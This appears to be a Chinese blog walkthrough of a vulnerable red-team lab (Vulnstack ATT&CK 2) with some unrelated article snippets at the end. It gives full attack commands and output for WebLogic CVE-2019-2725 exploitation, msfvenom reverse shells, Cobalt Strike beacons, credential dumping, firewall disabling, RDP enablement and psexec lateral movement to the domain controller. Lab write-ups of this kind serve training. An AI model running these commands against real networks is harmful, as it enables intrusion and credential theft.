ATTCK红队评估实战靶场(二)

server/2024/11/30 1:43:33/

http://vulnstack.qiyuanxuetang.net/vuln/?page=2

描述:红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX

(雾。。好多没听过的)

  1. Bypass UAC
  2. Windows系统NTLM获取(理论知识:Windows认证)
  3. Access Token利用(MSSQL利用)
  4. WMI利用
  5. 网页代理,二层代理,特殊协议代理(DNS,ICMP)
  6. 域内信息收集
  7. 域漏洞利用:SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用
  8. 域凭证收集
  9. 后门技术(黄金票据/白银票据/Sid History/MOF)

在这里插入图片描述

靶场搭建

  1. 网络配置信息,已经默认配置好,直接将网卡设置好即可

    DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD域

    WEB IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64) 应用:Weblogic 10.3.6 MSSQL 2008

    PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32)

    KALI IP :192.168.111.150

  2. 网卡设置

    NAT网卡网段改为192.168.111.0 ,仅主机模式网卡网段改为10.10.10.0

  3. WEB主机默认账户是登陆不进去的,需要切换为de1ay账户登陆进去

    然后来到 C:\Oracle\Middleware\user_projects\domains\base_domain\bin

    依次使用管理员模式打开 set domainenv startmanagerweblogic startweblogic

  4. kali访问http://192.168.111.80:7001/console

    在这里插入图片描述

开始渗透

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    Kaliip150 ,那么目标就是80以及201

    nmap -sP 192.168.111.0/24                   
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 15:39 CST
    Nmap scan report for 192.168.111.1
    Host is up (0.00051s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.111.2
    Host is up (0.00035s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.111.80
    Host is up (0.00024s latency).
    MAC Address: 00:0C:29:AC:FA:FB (VMware)
    Nmap scan report for 192.168.111.201
    Host is up (0.00033s latency).
    MAC Address: 00:0C:29:AD:EE:B7 (VMware)
    Nmap scan report for 192.168.111.254
    Host is up (0.00038s latency).
    MAC Address: 00:50:56:E6:0E:41 (VMware)
    Nmap scan report for 192.168.111.150
    
  2. 扫描主机开放端口

    # 192.168.111.80
    nmap -sT -min-rate 10000 -p- 192.168.111.80
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 15:42 CST
    Nmap scan report for 192.168.111.80
    Host is up (0.043s latency).
    Not shown: 65521 filtered tcp ports (no-response)
    PORT      STATE SERVICE
    80/tcp    open  http
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    1433/tcp  open  ms-sql-s
    3389/tcp  open  ms-wbt-server
    7001/tcp  open  afs3-callback
    49152/tcp open  unknown
    49153/tcp open  unknown
    49154/tcp open  unknown
    49155/tcp open  unknown
    49156/tcp open  unknown
    55068/tcp open  unknown
    60966/tcp open  unknown
    # 192.168.111.201
    nmap -sT -min-rate 10000 -p- 192.168.111.201
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 15:44 CST
    Nmap scan report for 192.168.111.201
    Host is up (0.044s latency).
    Not shown: 65525 filtered tcp ports (no-response)
    PORT      STATE SERVICE
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    3389/tcp  open  ms-wbt-server
    49152/tcp open  unknown
    49153/tcp open  unknown
    49154/tcp open  unknown
    49155/tcp open  unknown
    49156/tcp open  unknown
    60518/tcp open  unknown
    MAC Address: 00:0C:29:AD:EE:B7 (VMware)
    

    192.168.111.80存在web端口,所以是我们的优先目标

  3. 扫描主机服务版本以及系统版本

    nmap -sV -sT -O -p 80,135,139,445,1433,3389,7001 192.168.111.80
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 15:57 CST
    Nmap scan report for 192.168.111.80
    Host is up (0.0010s latency).PORT     STATE SERVICE        VERSION
    80/tcp   open  http           Microsoft IIS httpd 7.5
    135/tcp  open  msrpc          Microsoft Windows RPC
    139/tcp  open  netbios-ssn    Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds   Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
    1433/tcp open  ms-sql-s       Microsoft SQL Server 2008 R2 10.50.4000; SP2
    3389/tcp open  ms-wbt-server?
    7001/tcp open  http           Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
    1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
    SF-Port3389-TCP:V=7.94SVN%I=7%D=11/16%Time=67385090%P=x86_64-pc-linux-gnu%
    SF:r(TerminalServerCookie,13,"\x03\0\0\x13\x0e\xd0\0\0\x124\0\x02\x01\x08\
    SF:0\x02\0\0\0");
    MAC Address: 00:0C:29:AC:FA:FB (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: phone|specialized|general purpose
    Running (JUST GUESSING): Microsoft Windows Phone|7|8.1|2008|Vista (94%)
    OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1:r1 cpe:/o:microsoft:windows_server_2008::beta3 cpe:/o:microsoft:windows_server_2008 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8
    Aggressive OS guesses: Microsoft Windows Phone 7.5 or 8.0 (94%), Microsoft Windows Embedded Standard 7 (93%), Microsoft Windows 8.1 R1 (92%), Microsoft Windows 7 (91%), Microsoft Windows Server 2008 or 2008 Beta 3 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (90%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows Server 2008 R2 SP1 (88%)
    No exact OS matches for host (test conditions non-ideal).
    Network Distance: 1 hop
    Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 88.35 seconds
    

    扫出系统版本Microsoft Windows Server 2008 R2 ,以及MSSQLOracle WebLogic Server 10.3.6.0

  4. 扫描漏洞

    nmap -script=vuln -p 80,135,139,445,1433,3389,7001 192.168.111.80                                                                                                                                             
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-16 16:04 CST                                                                                                                                                
    Nmap scan report for 192.168.111.80                                                                                                                                                                               
    Host is up (0.0012s latency).                                                                                                                                                                                     PORT     STATE SERVICE                                                                                                                                                                                            
    80/tcp   open  http                                                                                                                                                                                               
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.                                                                                                                                                  
    |_http-dombased-xss: Couldn't find any DOM based XSS.                                                                                                                                                             
    |_http-csrf: Couldn't find any CSRF vulnerabilities.                                                                                                                                                              
    135/tcp  open  msrpc                                                                                                                                                                                              
    139/tcp  open  netbios-ssn                                                                                                                                                                                        
    445/tcp  open  microsoft-ds                                                                                                                                                                                       
    1433/tcp open  ms-sql-s                                                                                                                                                                                           
    | ssl-poodle:                                                                                                                                                                                                     
    |   VULNERABLE:                                                                                                                                                                                                   
    |   SSL POODLE information leak                                                                                                                                                                                   
    |     State: VULNERABLE                                                                                                                                                                                           
    |     IDs:  BID:70574  CVE:CVE-2014-3566            
    |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other                            
    |           products, uses nondeterministic CBC padding, which makes it easier                           
    |           for man-in-the-middle attackers to obtain cleartext data via a                               
    |           padding-oracle attack, aka the "POODLE" issue.                                               
    |     Disclosure date: 2014-10-14                   
    |     Check results:                                
    |       TLS_RSA_WITH_3DES_EDE_CBC_SHA               
    |     References:                                   
    |       https://www.securityfocus.com/bid/70574     
    |       https://www.imperialviolet.org/2014/10/14/poodle.html                                            
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566                                     
    |_      https://www.openssl.org/~bodo/ssl-poodle.pdf                                                     
    |_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)                                      
    3389/tcp open  ms-wbt-server                        
    7001/tcp open  afs3-callback                        
    MAC Address: 00:0C:29:AC:FA:FB (VMware)             Host script results:                                
    | smb-vuln-ms17-010:                                
    |   VULNERABLE:                                     
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)                            
    |     State: VULNERABLE  
    |     IDs:  CVE:CVE-2017-0143                       
    |     Risk factor: HIGH                             
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1                         
    |        servers (ms17-010).                        
    |                                                   
    |     Disclosure date: 2017-03-14                                                                        
    |     References:                                                                                        
    |       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx                               
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143                                     
    |_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
    |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED        
    |_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED                                                      
    |_smb-vuln-ms10-054: false
    

    扫出主机ms17-010永恒之蓝,不过开放了445应该都会扫出来,以及CVE-2014-3566 ,网上查阅说是信息泄露漏洞,web的好像没有扫出扫描漏洞,但是我们知道7001端口上是WebLogic ,可以查阅它的漏洞

    https://zh.wikipedia.org/wiki/%E8%B4%B5%E5%AE%BE%E7%8A%AC%E6%BC%8F%E6%B4%9E

web渗透

80端口

  1. 访问主页,是空页面

    在这里插入图片描述

  2. 尝试扫描目录

    gobuster dir -u http://192.168.111.80 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,zip,txt | grep -v "403"
    

    啥也没有扫出来,转7001端口

7001端口

  1. 访问主页

    在这里插入图片描述

  2. 发现/console能够正常访问到weblogic控制台

    在这里插入图片描述

    可以在右下角找到版本号WebLogic Server 版本: 10.3.6.0 ,和之前nmap扫描的一模一样

  3. 查阅漏洞

    • 通过searchexploit 搜索

      searchsploit WebLogic 10.3.6.0
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title                                                                                                                                                                  |  Path
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      Oracle Weblogic 10.3.6.0.0 - Remote Command Execution                                                                                                                           | java/webapps/47895.py
      Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution                                                                                                                 | windows/webapps/46780.py
      Oracle WebLogic Server 10.3.6.0 - Java Deserialization Remote Code Execution                                                                                                    | java/remote/42806.py
      Oracle Weblogic Server 10.3.6.0 / 12.1.3.0 / 12.2.1.2 / 12.2.1.3 - Deserialization Remote Command Execution                                                                     | multiple/remote/44553.py
      Oracle WebLogic Server 10.3.6.0.0 / 12.x - Remote Command Execution                                                                                                             | multiple/remote/43392.py
      WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request                                                            | java/webapps/48971.py
      -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
      

      存在远程命令执行

    • weblogic权限绕过(CVE-2020-14882)

      http://192.168.111.80:7001/console/css/%252e%252e%252fconsole.portal
      

      能直接进入后台,但是权限很低,无法利用

    • CVE-2019-2725 反序列化远程代码执行

      1. 拉取上面searchexploit 的搜索到的46780.py ,然后跟根据文件内部usage食用

        # Script Usage:
        # python exploit.py http://IP:PORT/_async/AsyncResponseServiceHttps
        # msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=1234 -f psh-cmd > exploit.ps1
        # Add the powershell command in the variable
        
      2. 先通过msfvenom生成payload文件

        msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.150 LPORT=1234 -f psh-cmd > exploit.ps1
        

        然后将文件exploit.ps1里面的内容替换到46780.pyexploit变量中的

      3. kali开启监听

        msf6 > use exploit/multi/handler 
        msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
        msf6 exploit(multi/handler) > set lhost 192.168.111.150
        msf6 exploit(multi/handler) > set lport 1234
        msf6 exploit(multi/handler) > run
        
      4. 执行脚本46780.py ,要通过python2执行

        python2 46780.py http://192.168.111.80:7001/_async/AsyncResponseServiceHttps
        Exploit Written by Avinash Kumar Thapa
        status_code:202
        <Response [202]>
        
      5. 最后回到Kali可以发现反弹成功了,并且用户是DE1AY\Administrator

        msf6 > use exploit/multi/handler 
        msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
        msf6 exploit(multi/handler) > set lhost 192.168.111.150
        msf6 exploit(multi/handler) > set lport 1234
        msf6 exploit(multi/handler) > run
        [*] Started reverse TCP handler on 192.168.111.150:1234 
        [*] Sending stage (176198 bytes) to 192.168.111.80
        [*] Meterpreter session 1 opened (192.168.111.150:1234 -> 192.168.111.80:49303) at 2024-11-16 18:38:27 +0800meterpreter > getuid
        Server username: DE1AY\Administrator
        

内网渗透

MSF派生CS

  1. 启动CS服务端,并用客户端连上

  2. CS设置HTTP监听器

    在这里插入图片描述

  3. MSF使用payload_inject 模块

    meterpreter > bg
    [*] Backgrounding session 1...
    msf6 exploit(multi/handler) > use exploit/windows/local/payload_inject 
    msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
    msf6 exploit(windows/local/payload_inject) > set lport 192.168.111.150
    msf6 exploit(windows/local/payload_inject) > set lport 80
    msf6 exploit(windows/local/payload_inject) > set disablepayloadhandler true 
    msf6 exploit(windows/local/payload_inject) > set prependmigrate true 
    msf6 exploit(windows/local/payload_inject) > set session 1
    msf6 exploit(windows/local/payload_inject) > run
    [*] Running module against WEB
    [*] Spawned Notepad process 3584
    [*] Injecting payload into 3584
    [*] Preparing 'windows/meterpreter/reverse_http' for PID 3584
    
  4. 然后回到CS就可以看到已经将主机派生过来了

    在这里插入图片描述

内网信息收寻

  1. 网络配置信息

    C:\Oracle\Middleware\user_projects\domains\base_domain>ipconfig
    Windows IP Configuration
    Ethernet adapter  2:Connection-specific DNS Suffix  . : Link-local IPv6 Address . . . . . : fe80::d153:9eef:2b9e:1c80%13IPv4 Address. . . . . . . . . . . : 10.10.10.80Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 10.10.10.1
    Ethernet adapter :Connection-specific DNS Suffix  . : Link-local IPv6 Address . . . . . : fe80::2836:b233:6919:8d8a%11IPv4 Address. . . . . . . . . . . : 192.168.111.80Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.111.1
    

    外网网段192.168.111.0 ,内网网段10.10.10.0

  2. 进程信息

    # ps
    2740  2120  360Tray.exe                   x86   1        DE1AY\Administrator           C:\Program Files (x86)\360\360Safe\safemon\360Tray.exe
    

    发现安装了360

  3. 主机信息

    meterpreter > sysinfo
    Computer        : WEB
    OS              : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).
    Architecture    : x64
    System Language : zh_CN
    Domain          : DE1AY
    Logged On Users : 8
    Meterpreter     : x86/windows
    

    发现存在域DE1AY

  4. 查看域详细信息

    beacon> shell net config workstation
    [*] Tasked beacon to run: net config workstation
    [+] host called home, sent: 53 bytes
    [+] received output:
    计算机名                     \\WEB
    计算机全名                   WEB.de1ay.com
    用户名                       Administrator工作站正运行于               NetBT_Tcpip_{D7E14072-49B9-45D3-BA8C-7955E6146CC2} (000C29ACFAFB)NetBT_Tcpip_{AD80CD23-D97F-4814-A715-9248D845EA0F} (000C29ACFA05)软件版本                     Windows Server 2008 R2 Standard工作站域                     DE1AY
    工作站域 DNS 名称            de1ay.com
    登录域                       DE1AY
    

    域为de1ay.com

  5. 查看本机用户(本机以及域用户)

    C:\Oracle\Middleware\user_projects\domains\base_domain>net user    
    net userUser accounts for \\WEB-------------------------------------------------------------------------------
    Administrator            de1ay                    Guest                    
    The command completed successfully.
    # 查看域用户被拒绝
    C:\Oracle\Middleware\user_projects\domains\base_domain>net user /domain
    net user /domain
    The request will be processed at a domain controller for domain de1ay.com.System error 5 has occurred.Access is denied.
    
  6. 查看域中主机,也是权限不足

    C:\Oracle\Middleware\user_projects\domains\base_domain>net group "domain computers" /domain
    The request will be processed at a domain controller for domain de1ay.com.System error 5 has occurred.Access is denied.
    
  7. 查看ARP列表

    meterpreter > arp -aARP cache
    =========IP address       MAC address        Interface----------       -----------        ---------10.10.10.1       00:50:56:c0:00:01  Intel(R) PRO/1000 MT Network Connection #210.10.10.10      00:0c:29:9c:85:b6  Intel(R) PRO/1000 MT Network Connection #210.10.10.201     00:0c:29:ad:ee:c1  Intel(R) PRO/1000 MT Network Connection #210.10.10.255     ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection #2192.168.111.1    00:50:56:c0:00:08  Intel(R) PRO/1000 MT Network Connection192.168.111.150  00:0c:29:de:14:88  Intel(R) PRO/1000 MT Network Connection192.168.111.255  ff:ff:ff:ff:ff:ff  Intel(R) PRO/1000 MT Network Connection224.0.0.22       00:00:00:00:00:00  Software Loopback Interface 1224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection224.0.0.22       01:00:5e:00:00:16  Intel(R) PRO/1000 MT Network Connection #2224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection224.0.0.252      01:00:5e:00:00:fc  Intel(R) PRO/1000 MT Network Connection #2
    

    发现内网主机 10201

CS抓取kiwi抓取密码及web主机提权

  1. CS抓取明文密码

    在这里插入图片描述

    kerberos :	* Username : Administrator # 大概率是域管理员* Domain   : de1ay.com* Password : 1qaz@WSX
    

    得到密码1qaz@WSX ,很多用户(de1ay,mssql)的密码都是这个,扫描到主机后可以横向移动

  2. 之前在MSF提权不成功,尝试在CS提权

    在这里插入图片描述

    beacon> elevate svc-exe HTTP-80
    [*] Tasked beacon to run windows/beacon_http/reverse_http (192.168.111.150:80) via Service Control Manager (\\127.0.0.1\ADMIN$\722628d.exe)
    [+] host called home, sent: 313305 bytes
    [+] received output:
    Started service 722628d on .
    

    提权成功,多出来一个会话,是system权限的

    在这里插入图片描述

web主机远程桌面

  1. 关闭防火墙(提权后第一件要做的事)

    beacon> shell netsh advfirewall set allprofiles state off
    [*] Tasked beacon to run: netsh advfirewall set allprofiles state off
    [+] host called home, sent: 74 bytes
    确定。
    
  2. 注册表开启远程桌面

    beacon> shell REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    [*] Tasked beacon to run: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
    [+] host called home, sent: 144 bytes
    [+] received output:
    操作成功完成
    
  3. 连接远程桌面

    proxychains rdesktop 192.168.111.80 -p 1qaz@WSX -u administrator
    

    登录 de1ay\administrator 时,需要更改新密码,我们将它修改为Aa118811

    在这里插入图片描述

    登陆成功

  4. 在里边进行信息收集

    在这里插入图片描述

    得到域成员 PC,WEB以及域控DC ,但是不知道IP

使用CS进行端口扫描

由于CS上目标只能发现WEB主机一台,没发现域内别的主机渗透不下去,也不能进行横向移动

在这里插入图片描述

beacon> portscan 10.10.10.0-10.10.10.255 1-1024,3389,5000-6000 arp 1024
[*] Tasked beacon to scan ports 1-1024,3389,5000-6000 on 10.10.10.0-10.10.10.255
[+] host called home, sent: 75365 bytes
[+] received output:
(ARP) Target '10.10.10.80' is alive. 00-0C-29-AC-FA-05
(ARP) Target '10.10.10.201' is alive. 00-0C-29-AD-EE-C1
(ARP) Target '10.10.10.254' is alive. 00-50-56-E7-10-69
10.10.10.201:3389
10.10.10.201:139
10.10.10.201:135
10.10.10.80:3389
10.10.10.80:139
10.10.10.80:135
10.10.10.80:80
10.10.10.10:5985
10.10.10.10:3389
10.10.10.10:636
10.10.10.10:593
10.10.10.10:464
10.10.10.10:389
10.10.10.10:139
10.10.10.10:135
10.10.10.10:88
10.10.10.10:53
10.10.10.1:5357
10.10.10.1:5040
10.10.10.1:3389
10.10.10.1:912
10.10.10.1:902
10.10.10.1:139
10.10.10.1:135
10.10.10.1:445
10.10.10.10:445 (platform: 500 version: 6.3 name: DC domain: DE1AY)
10.10.10.80:445 (platform: 500 version: 6.1 name: WEB domain: DE1AY)
10.10.10.201:445 (platform: 500 version: 6.1 name: PC domain: DE1AY)
Scanner module is complete

扫出来主机10.10.10.10以及10.10.10.201,10.10.10.80是web主机,并且都扫描出了445端口,并且都开启3389端口

在这里插入图片描述

CS的目标主机也发现了,DC是10.10.10.10,PC是10.10.10.201

横向移动

  1. 因为域内所有主机都开启445端口,所以我们创建一个SMB监听器来进行横向

    在这里插入图片描述

  2. CS再抓一次明文密码,因为我们之前登录远程桌面时修改了de1ay/administrator的密码

  3. 进行横向,右键DC选择psexec ,然后选择刚刚创建SMB监听器,点击Launch

    在这里插入图片描述

    beacon> jump psexec DC SMB-1
    [*] Tasked beacon to run windows/beacon_bind_pipe (\\.\pipe\test) on DC via Service Control Manager (\\DC\ADMIN$\eb3da6e.exe)
    [+] host called home, sent: 313378 bytes
    [+] Impersonated DE1AY.COM\administrator (netonly)
    [+] received output:
    Started service eb3da6e on DC
    [+] established link to child beacon: 10.10.10.10
    

    上线成功!!拿下DC

    在这里插入图片描述

  4. 继续拿下PC ,和上面一样的操操作

    在这里插入图片描述

    横向成功,拿下了

    在这里插入图片描述

不进行横向利用3389

  1. 上面内网端口扫描发现所有主机都开启可3389端口

  2. 结合我们上面使用kiwi抓取的明文密码,可以直接登陆上去

  3. 使用之前开启远程桌面的web主机作为跳板

  4. 连接远程桌面,在web主机里面远程DC以及PC即可

    在这里插入图片描述

还可以使用永恒之蓝漏洞

不写了

黄金票据(权限维持)

看我第一篇红日靶场的文章即可,主要收集krbtgt账户的HTLMHASH ,以及域管理员的SID ,域的名称,随便一个账户即可构造黄金票据


http://www.ppmy.cn/server/146044.html

相关文章

面试——HashMap的并发问题

HashMap是线程不安全&#xff0c;在并发使用HashMap时会发生下列问题&#xff1a; 数据丢失 HashMap底层数据结构为数组&#xff0c;之后如果发送了哈希冲突&#xff0c;那么数据会以列表的形式保存在这个下标下&#xff0c;当数据长度大于8时&#xff0c;则会转为红黑树。 存…

微信小程序全局配置:TabBar与页面配置详解

微信小程序全局配置:TabBar与页面配置详解 引言 随着移动互联网的迅猛发展,微信小程序作为一种新兴的应用形式,因其便捷性和丰富的功能而受到广泛欢迎。在小程序的开发过程中,全局配置是非常重要的一环,尤其是tabBar和页面的配置。本文将深入探讨微信小程序的全局配置,…

霍夫变换:原理剖析与 OpenCV 应用实例

简介&#xff1a;本文围绕霍夫变换相关内容展开&#xff0c;先是讲解霍夫变换基本原理&#xff0c;包含从 xy 坐标系到 kb 坐标系及极坐标系的映射等。接着介绍了 cv2.HoughLines、cv2.HoughLinesP 概率霍夫变换、cv2.HoughCircles 霍夫圆变换的函数用法、参数含义、与常规霍夫…

Diff差异算法

目录 虚拟DOM Diff算法 Diff过程 示例 总结 在Vue.js中&#xff0c;虚拟DOM&#xff08;Virtual DOM&#xff09;是其核心特性之一&#xff0c;它极大地提高了DOM更新的效率。Vue.js使用虚拟DOM的diff算法来比较新旧虚拟DOM树&#xff0c;从而确定最小的DOM更新操作。这种…

2024年11月27日Github流行趋势

项目名称&#xff1a;screenshot-to-code 项目维护者&#xff1a;abi clean99 sweep-ai kachbit vagusX项目介绍&#xff1a;通过上传截图将其转换为整洁的代码&#xff08;支持HTML/Tailwind/React/Vue&#xff09;。项目star数&#xff1a;62,429项目fork数&#xff1a;7,614…

学成在线day06

上传视屏 断点续传 通常视频文件都比较大&#xff0c;所以对于媒资系统上传文件的需求要满足大文件的上传要求。http协议本身对上传文件大小没有限制&#xff0c;但是客户的网络环境质量、电脑硬件环境等参差不齐&#xff0c;如果一个大文件快上传完了网断了没有上传完成&…

SpringBoot架构下宠物领养解决方案

第1章 绪论 1.1 课题背景 二十一世纪互联网的出现&#xff0c;改变了几千年以来人们的生活&#xff0c;不仅仅是生活物资的丰富&#xff0c;还有精神层次的丰富。时代进步的标志&#xff0c;就是让人们过上更好的生活。在互联网诞生之前&#xff0c;地域位置往往是人们思想上不…

MySQL:常用数据类型

专栏说明&#xff1a;本专栏用于MySQL学习&#xff0c;如对你学习有所帮助&#xff0c;可以点赞收藏关注&#xff0c;感谢三连。 博客主页&#xff1a;Duck Bro 博客主页系列专栏&#xff1a;MySQL数据库关注博主&#xff0c;后期持续更新系列文章如果有错误感谢请大家批评指出…